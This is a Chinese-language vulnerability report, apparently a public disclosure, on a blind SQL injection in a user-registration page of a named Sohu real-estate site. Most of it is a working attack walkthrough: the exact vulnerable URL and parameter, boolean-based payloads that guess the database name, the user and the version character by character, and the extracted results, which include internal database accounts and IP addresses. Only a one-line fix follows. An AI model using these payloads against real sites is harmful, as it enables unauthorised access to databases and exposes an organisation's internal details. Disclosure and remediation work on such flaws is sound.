搜狐某站点用户注册处存在SQL盲注漏洞下载

搜狐某站点用户注册处存在SQL注入漏洞

手工盲注是要吐血的。。http://home.focus.cn/



存在注入站点如上



存在注入链接





http://home.focus.cn/common/modules/spk/reg.php?id=628



正常访问：

http://home.focus.cn/common/modules/spk/reg.php?id=628

返回：

加单引号之后：

http://home.focus.cn/common/modules/spk/reg.php?id=628'

http://home.focus.cn/common/modules/spk/reg.php?id=628 and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and 1=2



返回不一样，虽然没有报错但是可以肯定是一个盲注点。而且还是一个数字类型的盲注。

判断database()长度



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (length(database())=6) and 1=1



得到结果是6



进一步猜测

http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(database(),1,1)) = 98) and 1=1

返回错误

http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(database(),1,1)) = 99) and 1=1

返回正常，说明第一个字母是c



以此类推可猜测出数据库名为：

common



猜user()



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),1,1)) = 102) and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),2,1)) = 100) and 1=1



http://home.focus.cn/common/modules/spk/reg.php?id=628 and (select ascii(substring(user(),3,1)) = 98) and 1=1



以此类推，得到

fdbuser@10.11.8.2

fdbuser@10.10.80.82



这里有个小技巧，猜解出现了2个user，应该是连接数据库用户有2个，所以得到结果不一。



一般盲注到这里不用怀疑，肯定是2个user了。



猜测version版本，得mysql5.0

修复方案：

过滤参数id